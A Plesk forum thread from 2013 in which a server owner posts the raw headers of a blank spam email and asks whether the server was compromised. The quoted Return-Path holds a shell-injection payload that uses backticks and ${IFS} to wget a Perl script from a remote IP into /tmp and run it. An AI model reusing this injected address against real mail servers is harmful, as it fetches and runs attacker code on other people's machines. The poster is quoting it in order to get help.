• The BIND DNS server has already been deprecated and removed from Plesk for Windows.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS. We strongly recommend transitioning to Microsoft DNS within the next 6 weeks, before the Plesk 18.0.70 release.
  • The Horde component is removed from Plesk Installer. We recommend switching to another webmail software supported in Plesk.

Receive suspicious email. hacked?

Azurel

Azurel

Silver Pleskian
Hi,

Yesterday (2013/06/19) I get strange email spam to my plesk email from my server.
There was no "Subject", no "To" and no "From". Only "x" as content.
So I look in RFC-Header of email and get this:

Return-Path: <"x`wget${IFS}-O${IFS}/tmp/zax.pl${IFS}http://212.30.46.158/zax.pl``perl${IFS}/tmp/zax.pl`"@pacbell.net>
X-Original-To: MY-PLESK-EMAIL
Delivered-To: [email protected]
X-Greylist: delayed 568 seconds by postgrey-1.32 at webgo24-server13.de; Wed, 19 Jun 2013 02:48:21 CEST
Received: from rsXXXXX.rs.hosteurope.de (rsXXXXX.rs.hosteurope.de [MY-SERVER-IP])
by mail.webgo24-server13.de (Postfix) with ESMTPS id D3F65304034A
for <MY-PLESK-EMAIL>; Wed, 19 Jun 2013 02:48:20 +0200 (CEST)
Received: by rsXXXXX.rs.hosteurope.de (Postfix)
id 2A2C860116; Wed, 19 Jun 2013 02:38:51 +0200 (CEST)
Delivered-To: [email protected]omain
Received: by rsXXXXX.rs.hosteurope.de (Postfix)
id 28C3560117; Wed, 19 Jun 2013 02:38:51 +0200 (CEST)
Delivered-To: [email protected]
X-No-Auth: unauthenticated sender
X-No-Relay: not in my network
Received: from domain.local (unknown [212.30.46.158])
by rsXXXXX.rs.hosteurope.de (Postfix) with ESMTP id E637060116
for <postmaster@localhost>; Wed, 19 Jun 2013 02:38:50 +0200 (CEST)



x
Click to expand...

- Thats a 1 month new server with Plesk 11.0.9#53
- There are no users, only myself
- Plesk-Panel is protected with htaccess
- There are three domains, but all of them without content (server is still only for testing plesk)
- Only access with "ssh private key file". login with root password or ftp are deactivated.


How I can get this email from my server? Does anyone have an idea?
Received: from rsXXXXX.rs.hosteurope.de (rsXXXXX.rs.hosteurope.de [MY-SERVER-IP])
Click to expand...
 
Last edited:
Last edited:
You must log in or register to reply here.

Similar threads

D
Issue Spoofed Emails Appearing as Sent from My Own Server Despite Correct SPF/DKIM/DMARC Configuration?
Replies
2
Views
2K
drdna
D
E
Question Is multiple HELO registration possible?
Replies
2
Views
672
emrekoc
E
B
Resolved How do I enable FTPS?
Replies
10
Views
1K
Kaspar
K
G
Issue [email protected] keeps sending e-mail notification even if i've edited panel.ini file.
Replies
2
Views
1K
IT Ufficio Key-One
I
W
Issue Mail forwarded on the server in the target mailbox is delivered to the SPAM folder
Replies
0
Views
537
W4ru
W
Back
Top